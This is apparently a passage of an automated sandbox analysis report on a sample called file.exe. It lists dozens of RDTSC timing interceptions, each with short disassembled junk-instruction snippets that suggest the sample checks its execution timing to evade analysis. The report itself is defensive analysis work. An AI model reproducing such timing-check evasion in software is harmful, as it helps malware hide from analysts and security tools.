                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC15 second address: 98FC36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D521h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FBD38D4D51Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FC36 second address: 98FC3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 923706 second address: 92370A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 994C37 second address: 994C46 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A6EE second address: 99A6F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A6F4 second address: 99A6F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9993B4 second address: 9993BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9993BF second address: 9993DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBD3853A992h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99965B second address: 99965F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997A0 second address: 9997A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997A6 second address: 9997AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997AA second address: 9997B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999A34 second address: 999A68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 jmp 00007FBD38D4D524h 0x00000016 pushad 0x00000017 jnc 00007FBD38D4D516h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 999A68 second address: 999A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A997h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A54B second address: 99A550 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99A550 second address: 99A568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A98Ah 0x00000009 jns 00007FBD3853A986h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 998F9F second address: 998FA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F0DC second address: 99F0F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A98Dh 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA9A second address: 99FA9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FA9E second address: 99FAA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FBD8 second address: 99FBDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FBDC second address: 99FBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A4679 second address: 9A467D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A467D second address: 9A469C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3853A986h 0x00000008 jl 00007FBD3853A986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 je 00007FBD3853A986h 0x00000017 jno 00007FBD3853A986h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A469C second address: 9A46A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A46A2 second address: 9A46A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A46A7 second address: 9A46DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D528h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBD38D4D529h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A46DC second address: 9A46E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A46E0 second address: 9A46E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9161B3 second address: 9161B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A8954 second address: 9A896E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007FBD38D4D51Bh 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AAE7D second address: 9AAE85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFC53 second address: 9AFC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFC5C second address: 9AFC82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A999h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push esi 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AFF20 second address: 9AFF28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B00BC second address: 9B00C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0234 second address: 9B0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FBD38D4D51Ah 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B03F9 second address: 9B03FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B03FF second address: 9B0428 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FBD38D4D520h 0x0000000e pushad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007FBD38D4D516h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B0428 second address: 9B042C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B042C second address: 9B0430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3A8F second address: 9B3AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBD3853A986h 0x0000000a jns 00007FBD3853A986h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3AA0 second address: 9B3AAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FBD38D4D516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B23A second address: 91B240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91B240 second address: 91B25E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FBD38D4D526h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3226 second address: 9B3232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FBD3853A986h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3232 second address: 9B3252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 jmp 00007FBD38D4D526h 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3793 second address: 9B3799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B3799 second address: 9B379D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B379D second address: 9B37A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B37A1 second address: 9B37A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B37A7 second address: 9B37AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B37AD second address: 9B37B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B37B4 second address: 9B37BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B95BF second address: 9B95C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B95C5 second address: 9B95D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B83CB second address: 9B83DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 ja 00007FBD38D4D516h 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8581 second address: 9B8590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B8590 second address: 9B85A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 js 00007FBD38D4D516h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95BC7A second address: 95BC82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B9287 second address: 9B92C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007FBD38D4D527h 0x0000000e push edx 0x0000000f jc 00007FBD38D4D516h 0x00000015 pushad 0x00000016 popad 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FBD38D4D51Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B92C1 second address: 9B92C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D11 second address: 9C2D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBD38D4D527h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D2F second address: 9C2D3B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBD3853A986h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D3B second address: 9C2D58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007FBD38D4D516h 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D58 second address: 9C2D84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBD3853A995h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2D84 second address: 9C2D8E instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBD38D4D516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1B6B second address: 9C1B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FBD3853A996h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1E6B second address: 9C1E7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jc 00007FBD38D4D516h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C1E7D second address: 9C1E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C2A26 second address: 9C2A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007FBD38D4D516h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD4C second address: 9CCD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBD3853A986h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCD59 second address: 9CCD74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FBD38D4D521h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC250 second address: 9CC26C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FBD3853A988h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBD3853A98Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CCA7F second address: 9CCA90 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FBD38D4D51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF04D second address: 9CF080 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FBD3853A986h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jg 00007FBD3853A986h 0x00000013 jbe 00007FBD3853A986h 0x00000019 pop edi 0x0000001a popad 0x0000001b push edx 0x0000001c jmp 00007FBD3853A98Eh 0x00000021 push esi 0x00000022 jno 00007FBD3853A986h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5DF5 second address: 9D5E17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D51Ah 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBD38D4D51Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D60E9 second address: 9D6104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD3853A98Eh 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6104 second address: 9D6108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6108 second address: 9D6117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FBD3853A986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D6117 second address: 9D6122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D63DC second address: 9D63F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A98Fh 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D63F3 second address: 9D63F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D63F8 second address: 9D640F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3853A993h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D66F9 second address: 9D6703 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D718A second address: 9D7196 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007FBD3853A986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D7196 second address: 9D71AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FBD38D4D516h 0x00000009 jmp 00007FBD38D4D51Bh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5823 second address: 9D5828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D5828 second address: 9D5833 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007FBD38D4D516h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD62F second address: 9DD634 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD634 second address: 9DD63A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD14E second address: 9DD15E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A98Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD15E second address: 9DD177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38D4D51Fh 0x00000009 ja 00007FBD38D4D516h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD177 second address: 9DD17B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DD17B second address: 9DD186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFA4A second address: 9DFA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFA4E second address: 9DFA54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DFA54 second address: 9DFA70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FBD3853A98Ah 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007FBD3853A986h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9DF8C3 second address: 9DF8E6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jns 00007FBD38D4D516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FBD38D4D525h 0x00000013 rdtsc
